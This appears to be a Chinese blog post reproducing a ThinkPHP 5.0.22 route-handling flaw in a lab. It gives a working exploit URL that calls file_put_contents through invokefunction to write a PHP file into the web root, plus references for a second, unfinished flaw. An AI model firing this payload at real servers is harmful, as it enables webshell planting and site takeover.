两个thinkphp_5.0.22的getshell漏洞复现

从官方下载thinkphp_5.0.22_with_extend.zip完整包部署,
a1.jpg

漏洞一(路由逻辑)复现:
在默认(没开启强制路由)的情况下,可轻易向WEB目录写入任意文件。

http://192.168.137.3/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ps5.php&vars[1][2]=lalalalalal

即可成功写入ps5.php

http://192.168.137.3/ps5.php 

a2.jpg
漏洞分析资料:https://paper.seebug.org/770/

漏洞二(表单伪装验证逻辑)复现:
待补充...
资料参考:https://www.freebuf.com/vuls/194127.html


标签: thinkphp, webshell

非特殊说明,本博所有文章均为博主原创。

最新文章

发表评论